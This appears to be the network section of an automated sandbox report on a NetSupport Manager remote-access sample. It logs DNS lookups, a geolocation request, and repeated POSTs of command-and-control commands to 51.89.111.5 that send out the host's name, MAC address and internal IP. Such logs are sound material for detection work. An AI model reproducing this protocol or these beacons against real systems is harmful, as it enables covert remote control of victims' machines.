                                                                                                              Nov 1, 2024 18:14:08.281620979 CET17714997651.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:08.373271942 CET499761771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:08.380090952 CET17714997651.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:08.473337889 CET499761771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:08.478431940 CET17714997651.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:08.574238062 CET499761771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:08.579200983 CET17714997651.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:08.674247026 CET499761771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:08.679222107 CET17714997651.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:08.774347067 CET499761771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:08.781955004 CET17714997651.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:08.849749088 CET17714997651.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:08.850667953 CET499761771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:08.850667953 CET499761771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:08.855531931 CET17714997651.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:39.360322952 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:39.410108089 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:39.410242081 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:39.414258003 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:39.430006981 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:44.417388916 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:44.422267914 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:44.518405914 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:44.523284912 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:44.618662119 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:44.623713017 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:44.719432116 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:44.724307060 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:44.820115089 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:44.825846910 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:44.920350075 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:44.928544998 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:45.022902012 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:45.028033018 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:45.121438026 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:45.126802921 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:45.222671032 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:45.227672100 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:45.322478056 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:45.327776909 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:45.422523022 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:45.427495003 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:45.526509047 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:45.532968998 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:45.624412060 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:45.629373074 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:45.728343964 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:45.733679056 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:45.824934959 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:45.829911947 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:45.925430059 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:45.930874109 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:46.025465012 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:46.030440092 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:46.125489950 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:46.136209011 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:46.326520920 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:46.332139969 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:46.686445951 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:46.691719055 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:46.786423922 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:46.791764021 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:46.886471033 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:46.891977072 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:46.988358974 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:46.993968010 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:47.088463068 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:47.094166040 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:47.189429045 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:47.194765091 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:47.290441990 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:47.389476061 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:47.490432978 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:47.504559994 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:47.590512037 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:47.691437006 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:47.793597937 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:47.808433056 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:48.342421055 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:48.342489958 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:48.342581034 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:48.342628956 CET499771771192.168.2.751.89.111.5
                                                                                                              Nov 1, 2024 18:14:48.342828035 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:48.342838049 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:48.342848063 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:48.344681025 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:48.345165014 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:48.345175982 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:48.345184088 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:48.345809937 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:48.349375963 CET17714997751.89.111.5192.168.2.7
                                                                                                              Nov 1, 2024 18:14:48.349390984 CET17714997751.89.111.5192.168.2.7
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 1, 2024 18:11:05.552392006 CET5577953192.168.2.71.1.1.1
                                                                                                              Nov 1, 2024 18:11:05.710354090 CET53557791.1.1.1192.168.2.7
                                                                                                              Nov 1, 2024 18:11:06.155489922 CET6128853192.168.2.71.1.1.1
                                                                                                              Nov 1, 2024 18:11:06.165287018 CET53612881.1.1.1192.168.2.7
                                                                                                              Nov 1, 2024 18:12:01.696290016 CET6067053192.168.2.71.1.1.1
                                                                                                              Nov 1, 2024 18:12:02.006411076 CET53606701.1.1.1192.168.2.7
                                                                                                              Nov 1, 2024 18:12:40.827343941 CET6178653192.168.2.71.1.1.1
                                                                                                              Nov 1, 2024 18:12:41.822643042 CET53617861.1.1.1192.168.2.7
                                                                                                              Nov 1, 2024 18:13:20.830710888 CET6228153192.168.2.71.1.1.1
                                                                                                              Nov 1, 2024 18:13:21.155447006 CET53622811.1.1.1192.168.2.7
                                                                                                              Nov 1, 2024 18:14:00.014039040 CET5429953192.168.2.71.1.1.1
                                                                                                              Nov 1, 2024 18:14:00.331142902 CET53542991.1.1.1192.168.2.7
                                                                                                              Nov 1, 2024 18:14:39.070131063 CET5984653192.168.2.71.1.1.1
                                                                                                              Nov 1, 2024 18:14:39.357215881 CET53598461.1.1.1192.168.2.7
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Nov 1, 2024 18:11:05.552392006 CET192.168.2.71.1.1.10x9700Standard query (0)pbkvithtosh07.comA (IP address)IN (0x0001)false
                                                                                                              Nov 1, 2024 18:11:06.155489922 CET192.168.2.71.1.1.10xea66Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                                              Nov 1, 2024 18:12:01.696290016 CET192.168.2.71.1.1.10x3d6aStandard query (0)pbkvithtosh07.comA (IP address)IN (0x0001)false
                                                                                                              Nov 1, 2024 18:12:40.827343941 CET192.168.2.71.1.1.10x9fd7Standard query (0)pbkvithtosh07.comA (IP address)IN (0x0001)false
                                                                                                              Nov 1, 2024 18:13:20.830710888 CET192.168.2.71.1.1.10xa905Standard query (0)pbkvithtosh07.comA (IP address)IN (0x0001)false
                                                                                                              Nov 1, 2024 18:14:00.014039040 CET192.168.2.71.1.1.10xd268Standard query (0)pbkvithtosh07.comA (IP address)IN (0x0001)false
                                                                                                              Nov 1, 2024 18:14:39.070131063 CET192.168.2.71.1.1.10xb655Standard query (0)pbkvithtosh07.comA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Nov 1, 2024 18:11:05.710354090 CET1.1.1.1192.168.2.70x9700No error (0)pbkvithtosh07.com51.89.111.5A (IP address)IN (0x0001)false
                                                                                                              Nov 1, 2024 18:11:06.165287018 CET1.1.1.1192.168.2.70xea66No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                                              Nov 1, 2024 18:11:06.165287018 CET1.1.1.1192.168.2.70xea66No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                                              Nov 1, 2024 18:11:06.165287018 CET1.1.1.1192.168.2.70xea66No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                                              Nov 1, 2024 18:12:02.006411076 CET1.1.1.1192.168.2.70x3d6aNo error (0)pbkvithtosh07.com51.89.111.5A (IP address)IN (0x0001)false
                                                                                                              Nov 1, 2024 18:12:41.822643042 CET1.1.1.1192.168.2.70x9fd7No error (0)pbkvithtosh07.com51.89.111.5A (IP address)IN (0x0001)false
                                                                                                              Nov 1, 2024 18:13:21.155447006 CET1.1.1.1192.168.2.70xa905No error (0)pbkvithtosh07.com51.89.111.5A (IP address)IN (0x0001)false
                                                                                                              Nov 1, 2024 18:14:00.331142902 CET1.1.1.1192.168.2.70xd268No error (0)pbkvithtosh07.com51.89.111.5A (IP address)IN (0x0001)false
                                                                                                              Nov 1, 2024 18:14:39.357215881 CET1.1.1.1192.168.2.70xb655No error (0)pbkvithtosh07.com51.89.111.5A (IP address)IN (0x0001)false
                                                                                                              • 51.89.111.5connection: keep-alivecmd=pollinfo=1ack=1
                                                                                                              • geo.netsupportsoftware.com
                                                                                                              • 51.89.111.5connection: keep-alivecmd=openclient_version=1.0protocol_ver=1.1maxpacket=928client_name=124406client_addr=>192.168.2.7port=5405hostname=124406macaddress=ecf4bb82f7e0gsk=odyvxtzr7zqv7l)yd6suoqaacmpi=60apptype=0dept=
                                                                                                              • 51.89.111.5connection: keep-alivecmd=poll
                                                                                                              • 51.89.111.5connection: keep-alivecmd=pollpost 51.89.111.5
                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.74970051.89.111.517716276C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 1, 2024 18:11:05.881328106 CET214OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 51.89.111.5Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:11:10.929682016 CET398OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 206Host: 51.89.111.5Connection: Keep-AliveCMD=OPENCLIENT_VERSION=1.0PROTOCOL_VER=1.1MAXPACKET=928CLIENT_NAME=124406CLIENT_ADDR=>192.168.2.7PORT=5405HOSTNAME=124406MACADDRESS=ECF4BB82F7E0GSK=ODyvxTzr7zqv7L)yd6sUoQAACMPI=60APPTYPE=0DEPT=
                                                                                                              Data Raw:
                                                                                                              Data Ascii:


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.749701104.26.0.231806276C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 1, 2024 18:11:06.227611065 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                                              Host: geo.netsupportsoftware.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cache-Control: no-cache
                                                                                                              Nov 1, 2024 18:11:07.200016022 CET782INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 01 Nov 2024 17:11:07 GMT
                                                                                                              Content-Type: text/html; Charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              CF-Ray: 8dbd808b1924e9b1-DFW
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              Access-Control-Allow-Origin: *
                                                                                                              Cache-Control: private
                                                                                                              Set-Cookie: ASPSESSIONIDACBSDDAB=LJPDEFECAHKGFGCMGEAIMPJL; path=/
                                                                                                              cf-apo-via: origin,host
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Powered-By: ASP.NET
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2BJfwa2wX%2FditrhsXZkr77Ahod0p8AVkPHWhTkK6Y42OKt5pJtcx4rcSXb1DC6zqAtVGy2khJPlv4hOEB09nafCHGT1DkTBLPXpJYBG9KBBRTyxNjhc2KuZg3DQ7edLbroigHU9J0uaj4fqK"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              Data Raw: 66 0d 0a 33 32 2e 37 37 36 37 2c 2d 39 36 2e 37 39 37 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: f32.7767,-96.7970


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              2192.168.2.74996551.89.111.517716276C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 1, 2024 18:12:02.060532093 CET214OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 51.89.111.5Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:07.062630892 CET398OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 206Host: 51.89.111.5Connection: Keep-AliveCMD=OPENCLIENT_VERSION=1.0PROTOCOL_VER=1.1MAXPACKET=928CLIENT_NAME=124406CLIENT_ADDR=>192.168.2.7PORT=5405HOSTNAME=124406MACADDRESS=ECF4BB82F7E0GSK=ODyvxTzr7zqv7L)yd6sUoQAACMPI=60APPTYPE=0DEPT=
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:07.565834999 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:07.666639090 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:07.767875910 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:07.867640018 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:07.968070030 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:08.068758965 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:08.169632912 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:08.270929098 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:08.370930910 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:08.471610069 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:08.572648048 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:08.673635006 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:08.774612904 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:08.874877930 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:08.974634886 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:09.075634956 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:09.176646948 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:09.281071901 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:09.381700039 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:09.482635975 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:09.583616972 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:09.684639931 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:09.784630060 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:09.884648085 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:09.984805107 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:10.085639954 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:10.185729980 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:10.286663055 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:10.387661934 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:10.488636971 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              3192.168.2.74997451.89.111.517716276C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 1, 2024 18:12:41.879384995 CET214OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 51.89.111.5Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:46.884069920 CET398OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 206Host: 51.89.111.5Connection: Keep-AliveCMD=OPENCLIENT_VERSION=1.0PROTOCOL_VER=1.1MAXPACKET=928CLIENT_NAME=124406CLIENT_ADDR=>192.168.2.7PORT=5405HOSTNAME=124406MACADDRESS=ECF4BB82F7E0GSK=ODyvxTzr7zqv7L)yd6sUoQAACMPI=60APPTYPE=0DEPT=
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:46.984056950 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:47.084059000 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
                                                                                                              Nov 1, 2024 18:12:47.181869984 CET201OUTPOST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL
                                                                                                              Data Raw:
                                                                                                              Data Ascii:
